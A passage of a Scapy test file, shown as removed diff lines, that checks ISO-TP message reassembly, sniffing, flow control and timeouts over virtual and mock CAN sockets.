-m.feed(CAN(identifier=0x241, data=dhex(""))) -msg = m.pop() -assert(msg is None) - -= Verify a single frame without EA -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is None) -assert(msg.data == dhex("AB CD EF 04")) - -= Single frame without EA, with excessive bytes in CAN frame -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("03 AB CD EF AB CD EF AB"))) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is None) -assert(msg.data == dhex("AB CD EF")) - -= Verify a single frame with EA -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("E2 04 01 02 03 04"))) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xE2) -assert(msg.data == dhex("01 02 03 04")) - -= Single CAN frame that has 2 valid interpretations -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("04 01 02 03 04"))) -msg = m.pop(0x241, None) -assert(msg.dst == 0x241) -assert(msg.exdst is None) -assert(msg.data == dhex("01 02 03 04")) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst == 0x04) -assert(msg.data == dhex("02")) - -= Verify multiple frames with EA -m = ISOTPMessageBuilder() -ff = CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")) -ff.time = 1005 -m.feed(ff) -m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17"))) -m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) -assert(msg.time == 1005) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) - -= Verify multiple frames with EA 2 -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05"))) -m.feed(CAN(identifier=0x641, data=dhex("AE 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17"))) -m.feed(CAN(identifier=0x641, data=dhex("AE 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xAE) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) - -= Verify that an EA starting with 1 will still work -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("1A 10 14 01 02 03 04 05"))) -m.feed(CAN(identifier=0x641, data=dhex("1A 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("1A 21 06 07 08 09 0A 0B"))) -m.feed(CAN(identifier=0x241, data=dhex("1A 22 0C 0D 0E 0F 10 11"))) -m.feed(CAN(identifier=0x241, data=dhex("1A 23 12 13 14 15 16 17"))) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0x1A) -assert(msg.src == 0x641) -assert(msg.exsrc is 0x1A) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14")) - -= Verify that an EA of 07 will still work -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("07 10 0A 01 02 03 04 05"))) -m.feed(CAN(identifier=0x641, data=dhex("07 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("07 21 06 07 08 09 0A 0B"))) -msg = m.pop(0x241, 0x07) -assert(msg.dst == 0x241) -assert(msg.exdst is 0x07) -assert(msg.src == 0x641) -assert(msg.exsrc is 0x07) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A")) - -= Verify that three interleaved messages can be sniffed simultaneously on the same identifier and extended address (very unrealistic) -m = ISOTPMessageBuilder() -ff = CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")) -ff.time = 300 -m.feed(ff) # start of message A -m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17"))) -ff = CAN(identifier=0x241, data=dhex("EA 10 10 31 32 33 34 35")) -ff.time = 400 -m.feed(ff) # start of message B -m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) -sf = CAN(identifier=0x241, data=dhex("EA 03 A6 A7 A8" )) -sf.time = 200 -m.feed(sf) # single-frame message C -m.feed(CAN(identifier=0x641, data=dhex("EA 30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 21 36 37 38 39 3A 3B"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 22 3C 3D 3E 3F 40" ))) # end of message B -m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) -m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) # end of message A -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.data == dhex("A6 A7 A8")) -assert(msg.time == 200) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) -assert(msg.time == 400) -assert(msg.data == dhex("31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40")) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) -assert(msg.time == 300) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) - - -= Verify multiple frames with EA from list -m = ISOTPMessageBuilder() -msgs = [ - CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")), - CAN(identifier=0x641, data=dhex("EA 30 03 00" )), - CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B")), - CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11")), - CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17")), - CAN(identifier=0x641, data=dhex("EA 30 03 00" )), - CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D")), - CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23")), - CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))] -m.feed(msgs) -msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) - -= Verify multiple frames with EA from list and iterator -m = ISOTPMessageBuilder() -msgs = [ - CAN(identifier=0x241, data=dhex("EA 10 28 01 02 03 04 05")), - CAN(identifier=0x641, data=dhex("EA 30 03 00" )), - CAN(identifier=0x241, data=dhex("EA 21 06 07 08 09 0A 0B")), - CAN(identifier=0x241, data=dhex("EA 22 0C 0D 0E 0F 10 11")), - CAN(identifier=0x241, data=dhex("EA 23 12 13 14 15 16 17")), - CAN(identifier=0x641, data=dhex("EA 30 03 00" )), - CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D")), - CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23")), - CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" )), - CAN(identifier=0x241, data=dhex("EA 03 A6 A7 A8" )), - CAN(identifier=0x241, data=dhex("EA 03 A6 A7 A8"))] -m.feed(msgs) -assert m.count == 3 -assert len(m) == 3 - -isotpmsgs = [x for x in m] -assert len(isotpmsgs) == 3 -msg = isotpmsgs[0] -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) - -assert isotpmsgs[1] == isotpmsgs[2] - -= Verify a single frame without EA and different basecls -m = ISOTPMessageBuilder(basecls=Raw) -m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) -msg = m.pop() -assert(msg.load == dhex("AB CD EF 04")) -assert(type(msg) == Raw) - -+ Test sniffer -= Test sniffer with multiple frames -~ vcan_socket needs_root linux - -test_frames = [ - (0x241, "EA 10 28 01 02 03 04 05"), - (0x641, "EA 30 03 00" ), - (0x241, "EA 21 06 07 08 09 0A 0B"), - (0x241, "EA 22 0C 0D 0E 0F 10 11"), - (0x241, "EA 23 12 13 14 15 16 17"), - (0x641, "EA 30 03 00" ), - (0x241, "EA 24 18 19 1A 1B 1C 1D"), - (0x241, "EA 25 1E 1F 20 21 22 23"), - (0x241, "EA 26 24 25 26 27 28" ), -] - -succ = False - -def sender(args=None): - global succ - with new_can_socket(iface0) as tx_sock: - for f in test_frames: - tx_sock.send(CAN(identifier=f[0], data=dhex(f[1]))) - succ = True - -with new_can_socket(iface0) as s: - thread = threading.Thread(target=sender) - sniffed = sniff(opened_socket=s, session=ISOTPSession, timeout=1, prn=lambda x: x.show2(), started_callback=thread.start, count=1) - -assert sniffed[0]['ISOTP'].data == bytearray(range(1, 0x29)) -assert(sniffed[0]['ISOTP'].src == 0x641) -assert(sniffed[0]['ISOTP'].exsrc is 0xEA) -assert(sniffed[0]['ISOTP'].dst == 0x241) -assert(sniffed[0]['ISOTP'].exdst is 0xEA) -thread.join(timeout=5) -assert(succ) - -+ ISOTPSocket tests - -= Single-frame receive -cans = MockCANSocket() -cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - msg = s.recv() - -assert(msg.data == dhex("01 02 03 04 05")) -assert(cans.sent_queue.empty()) - -= Single-frame send -cans = MockCANSocket() -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - s.send(ISOTP(dhex("01 02 03 04 05"))) - -msg = cans.sent_queue.get(True, 1) -assert(msg.data == dhex("05 01 02 03 04 05")) -assert(cans.sent_queue.empty()) -assert(cans.rcvd_queue.empty()) - -= Two frame receive -cans = MockCANSocket() -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - ready = threading.Event() - exception = None - succ = False - def sender(): - global exception, succ - try: - cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) - ready.set() - c = cans.sent_queue.get(True, 2) - assert(c.data == dhex("30 00 00")) - cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - succ = True - except Exception as ex: - exception = ex - raise ex - thread = threading.Thread(target=sender, name="sender") - thread.start() - ready.wait(timeout=5) - msg = s.recv() - thread.join(timeout=5) - -if exception is not None: - raise exception - -assert(succ) -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) -assert(cans.sent_queue.empty()) -assert(cans.rcvd_queue.empty()) - -= 20000 bytes receive -data = dhex("01 02 03 04 05")*4000 -cans = MockCANSocket() - -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - ready = threading.Event() - exception = None - succ = False - def sender(): - global exception, succ - try: - cf = ISOTP(data, dst=0x241).fragment() - ff = cf.pop(0) - cans.rcvd_queue.put(ff) - ready.set() - c = cans.sent_queue.get(True, 2) - assert(c.data == dhex("30 00 00")) - for f in cf: - cans.rcvd_queue.put(f) - succ = True - except Exception as ex: - exception = ex - raise ex - thread = threading.Thread(target=sender, name="sender") - thread.start() - ready.wait(15) - msg = s.recv() - thread.join(15) - -if exception is not None: - raise exception - -assert(succ) -assert(msg.data == data) -assert(cans.sent_queue.empty()) -assert(cans.rcvd_queue.empty()) - -cans = MockCANSocket() -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - s.send(ISOTP(dhex("01 02 03 04 05"))) - -= 20000 bytes send -data = dhex("01 02 03 04 05")*4000 -cans = MockCANSocket() -msg = ISOTP(data, dst=0x641) -succ = threading.Event() -ready = threading.Event() -fragments = msg.fragment() -ack = CAN(identifier=0x241, data=dhex("30 00 00")) - -def acker(): - ready.set() - ff = cans.sent_queue.get(True, 2) - assert(ff == fragments[0]) - cans.rcvd_queue.put(ack) - for fragment in fragments[1:]: - cf = cans.sent_queue.get(True, 2) - assert(fragment == cf) - succ.set() - -thread = threading.Thread(target=acker, name="acker") -thread.start() -ready.wait(timeout=5) - -with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: - s.send(msg) - -thread.join(15) -succ.wait(2) -assert(succ.is_set()) - -= Create and close ISOTP soft socket -with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241) as s: - assert(s.impl.rx_thread.is_alive()) - s.close() - assert(not s.impl.rx_thread.join(5)) - assert(not s.impl.rx_thread.is_alive()) - - -= Verify that all threads will die when GC collects the socket -import gc -s = ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241) -assert(s.impl.rx_thread.is_alive()) -impl = s.impl -s = None -r = gc.collect() -impl.rx_thread.join(10) # hope that the GC has made a pass -assert(not impl.rx_thread.is_alive()) - -= Test on_recv function with single frame -with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241) as s: - s.ins.on_recv(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) - msg, ts = s.ins.rx_queue.get(True, 1) - assert(msg == dhex("01 02 03 04 05")) - -= Test on_recv function with empty frame -with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241) as s: - s.ins.on_recv(CAN(identifier=0x241, data=b"")) - assert(s.ins.rx_queue.empty()) - -= Test on_recv function with single frame and extended addressing -with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241, extended_rx_addr=0xea) as s: - cf = CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05")) - s.ins.on_recv(cf) - msg, ts = s.ins.rx_queue.get(True, 1) - assert(msg == dhex("01 02 03 04 05")) - assert ts == cf.time - -= CF is sent when first frame is received -cans = MockCANSocket() -with ISOTPSocket(cans, sid=0x641, did=0x241) as s: - s.ins.on_recv(CAN(identifier=0x241, data=dhex("10 20 01 02 03 04 05 06"))) - can = cans.sent_queue.get(True, 1) - assert(can.identifier == 0x641) - assert(can.data == dhex("30 00 00")) - -cans.close() - -+ Testing ISOTPSocket with an actual CAN socket - -= Verify that packets are not lost if they arrive before the sniff() is called -with new_can_socket(iface0) as ss, new_can_socket0() as sr: - tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x01\x23\x45\x67")) - p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) - assert(len(p)==1) - tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x89\xab\xcd\xef")) - p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) - assert(len(p)==1) - -= Send single frame ISOTP message, using begin_send -with new_can_socket(iface0) as isocan, \ - ISOTPSocket(isocan, sid=0x641, did=0x241) as s, \ - new_can_socket0() as cans: - can = cans.sniff(timeout=2, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05")))) - assert(can[0].identifier == 0x641) - assert(can[0].data == dhex("05 01 02 03 04 05")) - -= Send many single frame ISOTP messages, using begin_send - -with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x641, did=0x241) as s, \ - new_can_socket0() as cans: - for i in range(100): - data = dhex("01 02 03 04 05") + struct.pack("B", i) - expected = struct.pack("B", len(data)) + data - can = cans.sniff(timeout=4, count=1, started_callback=lambda: s.begin_send(ISOTP(data=data))) - assert(can[0].identifier == 0x641) - print(can[0].data, data) - assert(can[0].data == expected) - - -= Send two-frame ISOTP message, using begin_send -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05 06 07 08")))) - assert can[0].identifier == 0x641 - assert can[0].data == dhex("10 08 01 02 03 04 05 06") - can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CAN(identifier = 0x241, data=dhex("30 00 00")))) - assert can[0].identifier == 0x641 - assert can[0].data == dhex("21 07 08") - -cans.close() - -= Send single frame ISOTP message -with new_can_socket(iface0) as cans: - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - s.send(ISOTP(data=dhex("01 02 03 04 05"))) - can = cans.sniff(timeout=1, count=1) - assert(can[0].identifier == 0x641) - assert(can[0].data == dhex("05 01 02 03 04 05")) - - -= Send two-frame ISOTP message -acker_ready = threading.Event() -def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - can = can_pkt[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) - -Thread(target=acker).start() -acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) - - -= Send two-frame ISOTP message with bs - -acker_ready = threading.Event() -def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - can = can_pkt[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 20 00"))) - -Thread(target=acker).start() -acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 20 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) - - -= Send two-frame ISOTP message with ST -acker_ready = threading.Event() -def acker(): - with new_can_socket0() as acks: - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - can = can_pkt[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 10"))) - -Thread(target=acker).start() -acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 10")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) - - -= Receive a single frame ISOTP message -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == None) - assert(isotp.exdst == None) - - -= Receive a single frame ISOTP message, with extended addressing -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == 0xc0) - assert(isotp.exdst == 0xea) - - -= Receive frames from CandumpReader -candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA''') - -with ISOTPSocket(CandumpReader(candump_fd), sid=0x241, did=0x541, listen_only=True) as s: - pkts = s.sniff(timeout=2, count=6) - assert(len(pkts) == 6) - isotp = pkts[0] - print(repr(isotp)) - print(hex(isotp.src)) - print(hex(isotp.dst)) - assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) - assert(isotp.src == 0x241) - assert(isotp.dst == 0x541) - -= Receive frames from CandumpReader with ISOTPSniffer without extended addressing -candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA''') - -pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_addr": False}) -assert(len(pkts) == 6) -isotp = pkts[0] -assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) -assert (isotp.dst == 0x541) - -= Receive frames from CandumpReader with ISOTPSniffer -* all flow control frames are detected as single frame with extended address - -candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA''') - -pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1) -assert(len(pkts) == 12) -isotp = pkts[1] -assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) -assert (isotp.dst == 0x541) -isotp = pkts[0] -assert(isotp.data == dhex("")) -assert (isotp.dst == 0x241) - -= Receive frames from CandumpReader with ISOTPSniffer and count -* all flow control frames are detected as single frame with extended address - -candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA - vcan0 541 [8] 10 0A DE AD BE EF AA AA - vcan0 241 [3] 30 00 00 - vcan0 541 [5] 21 AA AA AA AA''') - -pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, count=2) -assert(len(pkts) == 2) -isotp = pkts[1] -assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) -assert (isotp.dst == 0x541) -isotp = pkts[0] -assert(isotp.data == dhex("")) -assert (isotp.dst == 0x241) - -= ISOTPSession tests - -ses = ISOTPSession() -ses.on_packet_received(None) -ses.on_packet_received([None, None]) -assert True - -= Receive a two-frame ISOTP message -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) - cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) - -= Check what happens when a CAN frame with wrong identifier gets received -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x141, data = dhex("05 01 02 03 04 05"))) - assert(s.ins.rx_queue.empty()) - -+ Testing ISOTPSocket timeouts - -= Check if not sending the last CF will make the socket timeout -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) - cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) - isotp = s.sniff(timeout=1) - -assert(len(isotp) == 0) - -= Check if not sending the first CF will make the socket timeout -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) - isotp = s.sniff(timeout=1) - -assert(len(isotp) == 0) - -= Check if not sending the first FC will make the socket timeout -exception = None -isotp = ISOTP(data=dhex("01 02 03 04 05 06 07 08 09 0A")) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - try: - s.send(isotp) - assert(False) - except Scapy_Exception as ex: - exception = ex - -assert(str(exception) == "TX state was reset due to timeout" or str(exception) == "ISOTP send not completed in 30s") - -= Check if not sending the second FC will make the socket timeout -exception = None -isotp = ISOTP(data=b"\xa5" * 120) -test_sem = threading.Semaphore(0) -evt = threading.Event() - -def acker(): - with new_can_socket(iface0) as cans: - evt.set() - can = cans.sniff(timeout=1, count=1)[0] - cans.send(CAN(identifier = 0x241, data=dhex("30 04 00"))) - -thread = Thread(target=acker) -thread.start() -evt.wait(timeout=5) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - try: - s.send(isotp) - except Scapy_Exception as ex: - exception = ex - -cans.close() -thread.join(timeout=5) - -assert(exception is not None) -print(exception) -assert(str(exception) == "TX state was reset due to timeout") - -= Check if reception of an overflow FC will make a send fail -exception = None -isotp = ISOTP(data=b"\xa5" * 120) -test_sem = threading.Semaphore(0) -evt = threading.Event() - -def acker(): - with 